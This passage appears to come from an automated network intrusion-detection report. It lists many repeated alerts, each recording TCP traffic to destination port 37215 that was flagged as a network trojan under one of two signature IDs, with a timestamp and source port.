                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.386841
                  SID:2829579
                  Source Port:36344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.937541
                  SID:2835222
                  Source Port:40800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.187114
                  SID:2829579
                  Source Port:49616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.107350
                  SID:2829579
                  Source Port:35098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.946859
                  SID:2835222
                  Source Port:54034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.537830
                  SID:2835222
                  Source Port:43242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.042472
                  SID:2829579
                  Source Port:34722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835988
                  SID:2835222
                  Source Port:50204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.831148
                  SID:2829579
                  Source Port:58020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.433538
                  SID:2835222
                  Source Port:46870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.528829
                  SID:2829579
                  Source Port:38694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.410235
                  SID:2829579
                  Source Port:55188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.754547
                  SID:2835222
                  Source Port:34166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.066193
                  SID:2835222
                  Source Port:34252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.552864
                  SID:2835222
                  Source Port:38650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.382366
                  SID:2829579
                  Source Port:41520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.668166
                  SID:2829579
                  Source Port:53928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.329520
                  SID:2835222
                  Source Port:42026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.438792
                  SID:2829579
                  Source Port:52870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.452655
                  SID:2829579
                  Source Port:43902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.833668
                  SID:2829579
                  Source Port:36998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.179402
                  SID:2829579
                  Source Port:57314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.956941
                  SID:2835222
                  Source Port:39580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.590326
                  SID:2835222
                  Source Port:40210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.000984
                  SID:2829579
                  Source Port:49996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.149235
                  SID:2835222
                  Source Port:60244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.743404
                  SID:2835222
                  Source Port:46266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.401211
                  SID:2835222
                  Source Port:34442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.855166
                  SID:2835222
                  Source Port:46392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385980
                  SID:2835222
                  Source Port:53886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.855669
                  SID:2835222
                  Source Port:43248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.809018
                  SID:2835222
                  Source Port:57338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.822671
                  SID:2835222
                  Source Port:55622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.509517
                  SID:2835222
                  Source Port:59062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.460068
                  SID:2829579
                  Source Port:58214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.726260
                  SID:2829579
                  Source Port:53072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.310964
                  SID:2829579
                  Source Port:57546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.545025
                  SID:2835222
                  Source Port:42550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.840826
                  SID:2829579
                  Source Port:47032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.771362
                  SID:2835222
                  Source Port:59940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.445688
                  SID:2829579
                  Source Port:42222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.406013
                  SID:2835222
                  Source Port:40380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.743461
                  SID:2829579
                  Source Port:58264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.601201
                  SID:2829579
                  Source Port:39508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819021
                  SID:2835222
                  Source Port:50878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.834024
                  SID:2835222
                  Source Port:46592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.538711
                  SID:2835222
                  Source Port:46644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.013937
                  SID:2829579
                  Source Port:34014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.128612
                  SID:2835222
                  Source Port:47334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.273376
                  SID:2835222
                  Source Port:56446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.895766
                  SID:2835222
                  Source Port:42928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.859718
                  SID:2829579
                  Source Port:40934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.367813
                  SID:2829579
                  Source Port:58020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.964382
                  SID:2829579
                  Source Port:50628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.952903
                  SID:2829579
                  Source Port:38074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.951496
                  SID:2835222
                  Source Port:56720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.263619
                  SID:2829579
                  Source Port:41266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.670311
                  SID:2829579
                  Source Port:47130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.950473
                  SID:2835222
                  Source Port:51010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.828645
                  SID:2829579
                  Source Port:50940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.268885
                  SID:2829579
                  Source Port:34786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.907935
                  SID:2829579
                  Source Port:55876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.047210
                  SID:2829579
                  Source Port:57484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.867068
                  SID:2835222
                  Source Port:51838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.487738
                  SID:2829579
                  Source Port:45102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.595538
                  SID:2829579
                  Source Port:49460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.791208
                  SID:2835222
                  Source Port:44828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.917896
                  SID:2829579
                  Source Port:37138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.399838
                  SID:2835222
                  Source Port:41522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.329184
                  SID:2829579
                  Source Port:41614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.800330
                  SID:2829579
                  Source Port:50850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.349931
                  SID:2829579
                  Source Port:35268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.616728
                  SID:2835222
                  Source Port:54118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.804179
                  SID:2829579
                  Source Port:34706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.634002
                  SID:2835222
                  Source Port:37750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.304428
                  SID:2835222
                  Source Port:40972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.481164
                  SID:2829579
                  Source Port:37730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.281691
                  SID:2835222
                  Source Port:37604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.876931
                  SID:2835222
                  Source Port:36794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.835787
                  SID:2835222
                  Source Port:54320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376641
                  SID:2829579
                  Source Port:36938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.945203
                  SID:2835222
                  Source Port:44220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.849786
                  SID:2829579
                  Source Port:49692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.863618
                  SID:2835222
                  Source Port:42370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.667418
                  SID:2835222
                  Source Port:58102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.968818
                  SID:2835222
                  Source Port:42092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778928
                  SID:2829579
                  Source Port:51780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.895563
                  SID:2835222
                  Source Port:38976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.293850
                  SID:2835222
                  Source Port:50792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.962924
                  SID:2829579
                  Source Port:44972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.001692
                  SID:2835222
                  Source Port:42022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.272369
                  SID:2835222
                  Source Port:47946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415966
                  SID:2835222
                  Source Port:56734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.492673
                  SID:2835222
                  Source Port:36142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.081340
                  SID:2829579
                  Source Port:45988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.739643
                  SID:2835222
                  Source Port:60006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.972894
                  SID:2835222
                  Source Port:53462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.330025
                  SID:2829579
                  Source Port:45718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810148
                  SID:2829579
                  Source Port:45354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.176119
                  SID:2829579
                  Source Port:50842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.971653
                  SID:2835222
                  Source Port:51822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.025599
                  SID:2829579
                  Source Port:42754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.305331
                  SID:2835222
                  Source Port:57082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.290152
                  SID:2835222
                  Source Port:60218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.224405
                  SID:2835222
                  Source Port:57408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.442077
                  SID:2829579
                  Source Port:32874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.873647
                  SID:2835222
                  Source Port:36106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.865429
                  SID:2829579
                  Source Port:57836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885160
                  SID:2835222
                  Source Port:58066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.278406
                  SID:2829579
                  Source Port:48776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.953099
                  SID:2829579
                  Source Port:41472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.415426
                  SID:2835222
                  Source Port:41308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.528584
                  SID:2835222
                  Source Port:53758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.816598
                  SID:2829579
                  Source Port:44560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.860039
                  SID:2835222
                  Source Port:44748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558738
                  SID:2835222
                  Source Port:38524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.875221
                  SID:2835222
                  Source Port:36620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.857818
                  SID:2835222
                  Source Port:46390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.088897
                  SID:2829579
                  Source Port:38428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.652813
                  SID:2829579
                  Source Port:43618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.290002
                  SID:2829579
                  Source Port:39722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.957475
                  SID:2835222
                  Source Port:44324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.838823
                  SID:2835222
                  Source Port:52166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.773841
                  SID:2835222
                  Source Port:47060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.547112
                  SID:2835222
                  Source Port:57512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.661764
                  SID:2835222
                  Source Port:33590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.393552
                  SID:2829579
                  Source Port:43042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.525014
                  SID:2829579
                  Source Port:48276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.592192
                  SID:2835222
                  Source Port:44698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.911091
                  SID:2829579
                  Source Port:39344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.819552
                  SID:2829579
                  Source Port:35564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.872780
                  SID:2829579
                  Source Port:49176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.967087
                  SID:2835222
                  Source Port:47844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.545820
                  SID:2835222
                  Source Port:43412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.345555
                  SID:2829579
                  Source Port:48498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.813781
                  SID:2829579
                  Source Port:54794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.540139
                  SID:2835222
                  Source Port:38738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.318439
                  SID:2835222
                  Source Port:60484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.901081
                  SID:2835222
                  Source Port:59832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369832
                  SID:2835222
                  Source Port:57878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.449750
                  SID:2829579
                  Source Port:38438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.750932
                  SID:2835222
                  Source Port:48824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.364400
                  SID:2829579
                  Source Port:50730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.583882
                  SID:2829579
                  Source Port:50332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.430208
                  SID:2829579
                  Source Port:43092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.442425
                  SID:2829579
                  Source Port:49912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.105929
                  SID:2829579
                  Source Port:42856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.819720
                  SID:2829579
                  Source Port:38838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.595254
                  SID:2835222
                  Source Port:34562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.631104
                  SID:2829579
                  Source Port:50842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.496138
                  SID:2829579
                  Source Port:44326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.672315
                  SID:2835222
                  Source Port:47152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.110888
                  SID:2835222
                  Source Port:36932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.294110
                  SID:2829579
                  Source Port:55540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.129379
                  SID:2835222
                  Source Port:35762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.361617
                  SID:2829579
                  Source Port:52868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.202392
                  SID:2835222
                  Source Port:46540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641843
                  SID:2835222
                  Source Port:45458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650012
                  SID:2829579
                  Source Port:36324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.127270
                  SID:2835222
                  Source Port:54160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.547340
                  SID:2835222
                  Source Port:36954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.315814
                  SID:2829579
                  Source Port:58344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.069203
                  SID:2835222
                  Source Port:36812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.467613
                  SID:2829579
                  Source Port:59036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600322
                  SID:2835222
                  Source Port:37518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.574488
                  SID:2829579
                  Source Port:33264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.036336
                  SID:2829579
                  Source Port:51914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.039541
                  SID:2835222
                  Source Port:36638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.825346
                  SID:2829579
                  Source Port:52348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.931065
                  SID:2829579
                  Source Port:53006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.827711
                  SID:2829579
                  Source Port:45360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.392716
                  SID:2829579
                  Source Port:54872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.881879
                  SID:2829579
                  Source Port:45676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.564039
                  SID:2829579
                  Source Port:45570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.474549
                  SID:2829579
                  Source Port:42474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.081340
                  SID:2829579
                  Source Port:58250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.667183
                  SID:2829579
                  Source Port:54544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.054322
                  SID:2829579
                  Source Port:38668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.853498
                  SID:2835222
                  Source Port:35884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.851193
                  SID:2835222
                  Source Port:35406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.454904
                  SID:2829579
                  Source Port:33610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.878157
                  SID:2829579
                  Source Port:48586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.559243
                  SID:2835222
                  Source Port:39578
